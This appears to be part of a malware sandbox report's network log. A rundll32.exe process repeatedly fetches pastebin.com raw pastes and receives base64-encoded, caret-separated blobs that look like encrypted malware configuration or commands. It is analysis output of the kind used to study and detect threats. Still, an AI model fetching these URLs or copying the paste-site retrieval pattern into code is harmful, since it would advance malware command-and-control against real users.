2024-10-03 01:34:39 UTC	391	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:39 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc930e33c214314-EWR
2024-10-03 01:34:39 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49724	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:40 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:40 UTC	395	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:40 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 1 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc930f07a0a7d02-EWR
2024-10-03 01:34:40 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49725	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:41 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:41 UTC	395	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:41 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 2 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc930f4f9e842f4-EWR
2024-10-03 01:34:41 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49727	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:42 UTC	158	OUT	GET /raw/hQqNRrQt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:43 UTC	391	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:43 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Thu, 03 Oct 2024 01:34:43 GMT Server: cloudflare CF-RAY: 8cc930fabab38ce9-EWR
2024-10-03 01:34:43 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 56 69 37 48 74 63 4f 73 51 61 45 65 61 34 2f 38 51 49 49 33 65 48 4a 55 2f 55 65 41 41 6a 67 31 68 32 58 36 57 55 4e 31 6e 62 44 4d 54 63 6d 4b 64 75 46 71 42 33 73 2f 43 67 36 32 6e 78 4d 79 61 32 66 42 6e 4c 67 42 47 69 58 37 37 79 6f 4f 4a 6d 4c 47 74 51 3d 3d 5e 5e 5e 47 35 68 4e 61 55 51 52 4a 30 31 64 4b 38 62 62 77 76 73 59 57 67 3d 3d 5e 5e 5e 30 35 2d 2d 31 32 2d 30 35 5e 5e 5e 51 53 49 73 6e 66 72 37 67 52 6b 4c 48 42 5a 34 42 4c 45 30 72 51 3d 3d 5e 5e 5e 36 76 34 6c 68 6e 6f 36 47 4c 36 56 52 35 4c 69 59 31 50 52 61 52 6b 52 64 2b 4e 32 31 4f 34 38 49 2f 33 4a 61 2b 74 30 69 56 6a 36 4c 47 4f 56 37 61 46 56 70 76 57 72 6f 4e 71 33 71 55 63 4c 65 46 2f 4a 6d 50 65 35 74 35 63 4b 78 7a 58 2b 70 76 37 76 6b 67 3d 3d 5e 5e Data Ascii: 116^^^Vi7HtcOsQaEea4/8QII3eHJU/UeAAjg1h2X6WUN1nbDMTcmKduFqB3s/Cg62nxMya2fBnLgBGiX77yoOJmLGtQ==^^^G5hNaUQRJ01dK8bbwvsYWg==^^^05--12-05^^^QSIsnfr7gRkLHBZ4BLE0rQ==^^^6v4lhno6GL6VR5LiY1PRaRkRd+N21O48I/3Ja+t0iVj6LGOV7aFVpvWroNq3qUcLeF/JmPe5t5cKxzX+pv7vkg==^^
2024-10-03 01:34:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49728	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:44 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:44 UTC	395	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:44 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 5 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc93108cc1f4378-EWR
2024-10-03 01:34:44 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49729	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:45 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:45 UTC	395	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:45 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 6 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9310d6ff28c4e-EWR
2024-10-03 01:34:45 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49731	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:46 UTC	158	OUT	GET /raw/hQqNRrQt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:46 UTC	395	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:46 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 3 Last-Modified: Thu, 03 Oct 2024 01:34:43 GMT Server: cloudflare CF-RAY: 8cc93113d95032dc-EWR
2024-10-03 01:34:46 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 56 69 37 48 74 63 4f 73 51 61 45 65 61 34 2f 38 51 49 49 33 65 48 4a 55 2f 55 65 41 41 6a 67 31 68 32 58 36 57 55 4e 31 6e 62 44 4d 54 63 6d 4b 64 75 46 71 42 33 73 2f 43 67 36 32 6e 78 4d 79 61 32 66 42 6e 4c 67 42 47 69 58 37 37 79 6f 4f 4a 6d 4c 47 74 51 3d 3d 5e 5e 5e 47 35 68 4e 61 55 51 52 4a 30 31 64 4b 38 62 62 77 76 73 59 57 67 3d 3d 5e 5e 5e 30 35 2d 2d 31 32 2d 30 35 5e 5e 5e 51 53 49 73 6e 66 72 37 67 52 6b 4c 48 42 5a 34 42 4c 45 30 72 51 3d 3d 5e 5e 5e 36 76 34 6c 68 6e 6f 36 47 4c 36 56 52 35 4c 69 59 31 50 52 61 52 6b 52 64 2b 4e 32 31 4f 34 38 49 2f 33 4a 61 2b 74 30 69 56 6a 36 4c 47 4f 56 37 61 46 56 70 76 57 72 6f 4e 71 33 71 55 63 4c 65 46 2f 4a 6d 50 65 35 74 35 63 4b 78 7a 58 2b 70 76 37 76 6b 67 3d 3d 5e 5e Data Ascii: 116^^^Vi7HtcOsQaEea4/8QII3eHJU/UeAAjg1h2X6WUN1nbDMTcmKduFqB3s/Cg62nxMya2fBnLgBGiX77yoOJmLGtQ==^^^G5hNaUQRJ01dK8bbwvsYWg==^^^05--12-05^^^QSIsnfr7gRkLHBZ4BLE0rQ==^^^6v4lhno6GL6VR5LiY1PRaRkRd+N21O48I/3Ja+t0iVj6LGOV7aFVpvWroNq3qUcLeF/JmPe5t5cKxzX+pv7vkg==^^
2024-10-03 01:34:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49732	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:47 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:47 UTC	395	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:47 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 8 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc93118bee742bc-EWR
2024-10-03 01:34:47 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49733	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:47 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:47 UTC	395	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:47 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 8 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9311d685a18d0-EWR
2024-10-03 01:34:47 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49734	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:48 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:48 UTC	395	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:48 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 9 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc931221e804375-EWR
2024-10-03 01:34:48 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49735	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:49 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:49 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:49 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 10 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9312678a97d11-EWR
2024-10-03 01:34:49 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49737	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:50 UTC	158	OUT	GET /raw/hQqNRrQt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
